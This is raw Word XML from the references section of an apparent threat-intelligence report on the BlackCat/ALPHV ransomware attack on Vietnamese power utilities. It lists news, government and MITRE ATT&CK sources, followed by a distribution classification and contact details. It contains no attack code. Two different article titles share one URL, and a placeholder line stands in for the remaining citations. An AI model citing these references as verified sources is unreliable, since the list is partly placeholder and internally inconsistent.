      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ts41nv6bcuen" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7ta7pfm9cmdq" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] The Cyber Express, "BlackCat Ransomware Strikes Ho Chi Minh City Power Corporation," December 2023. </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://thecyberexpress.com/vietnam-electricity-data-breach/</w:t>
        </w:r>
      </w:hyperlink>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[2] The Cyber Express, "84 Samples from Vietnam Electricity Data Breach Posted," December 2023. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://thecyberexpress.com/vietnam-electricity-data-breach/</w:t>
        </w:r>
      </w:hyperlink>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[3] FBI, "ALPHV BlackCat Ransomware Indicators of Compromise," IC3 Alert, September 2023. </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.ic3.gov/Media/News/2023/230919.pdf</w:t>
        </w:r>
      </w:hyperlink>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[4] Barracuda Networks, "ALPHV-BlackCat Ransomware Group Goes Dark," March 6, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.barracuda.com/2024/03/06/alphv-blackcat-ransomware-goes-dark</w:t>
        </w:r>
      </w:hyperlink>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[5] CISA, "AA23-353A #StopRansomware: ALPHV BlackCat (Update)," February 27, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3pgyglpbh6jw" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[30] MITRE ATT&amp;CK, "T1078: Valid Accounts," Enterprise Matrix v14.1, October 2024.</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[32] CISA, "Alert AA23-353A: ALPHV BlackCat Ransomware," Updated February 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_adrsx7wvwxba" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] Vietnam National Cyber Security Center, "EVN Incident Timeline," Report VNCSC-2023-1221, December 2023.</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[10] Vietnam Electricity, "EVN Annual Report 2023," Section 7.4: Cybersecurity Incidents, March 2024.</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[35] Ho Chi Minh City Power Corporation, "Security Incident Disclosure," EVNHCMC-2023-12, December 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9bv4dl5mjrea" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[67] MITRE ATT&amp;CK, "T1199: Trusted Relationship," Enterprise Matrix v14.1, October 2024.</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[70] MITRE ATT&amp;CK, "T1059.001: PowerShell," Enterprise Matrix v14.1, October 2024.</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[71] MITRE ATT&amp;CK for ICS, "T0840: Network Connection Enumeration," v2.1, October 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2gj8qydtvgzd" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Industry Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[14] ASEAN Centre for Energy, "Regional Power Grid Security Assessment," December 2023.</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[19] ASEAN Power Grid Consultative Committee, "Cross-Border Interconnection Vulnerabilities," 2024.</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[54] Institute of Energy Economics Japan, "ASEAN Energy Security Post-EVN Incident," January 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ykj7a119usz6" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">News and Media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[36] VnExpress International, "Ho Chi Minh City Power Outage Fears After Cyber Attack," December 23, 2023.</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[37] The Register, "Spanish Electricity Company SerCide Hit by BlackCat," February 13, 2024.</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[45] BleepingComputer, "FBI: ALPHV Ransomware Raked in $300 Million from Over 1,000 Victims," September 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hfna9v2s7mhg" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Government Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] U.S. Department of State, "Reward for Information: ALPHV/BlackCat Ransomware as a Service," February 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.state.gov/reward-for-information-alphv-blackcat-ransomware-as-a-service/</w:t>
        </w:r>
      </w:hyperlink>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[27] Department of Justice, "International Law Enforcement Disrupts ALPHV/BlackCat Ransomware," December 19, 2023.</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[References continue through [113] - comprehensive citations for all claims]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Document Classification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: TLP:AMBER+STRICT - Energy Sector Distribution</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ASEAN Energy Leadership and Authorized Security Personnel</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">asean-energy@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | +65-XXXX-XXXX</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isa.gov/news-events/cybersecurity-advisories/aa23-353a" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.barracuda.com/2024/03/06/alphv-blackcat-ransomware-goes-dark" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:asean-energy@nccgroup.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.state.gov/reward-for-information-alphv-blackcat-ransomware-as-a-serv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c3.gov/Media/News/2023/230919.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:asean-energy@nccgroup.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thecyberexpress.com/vietnam-electricity-data-breach/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thecyberexpress.com/vietnam-electricity-data-b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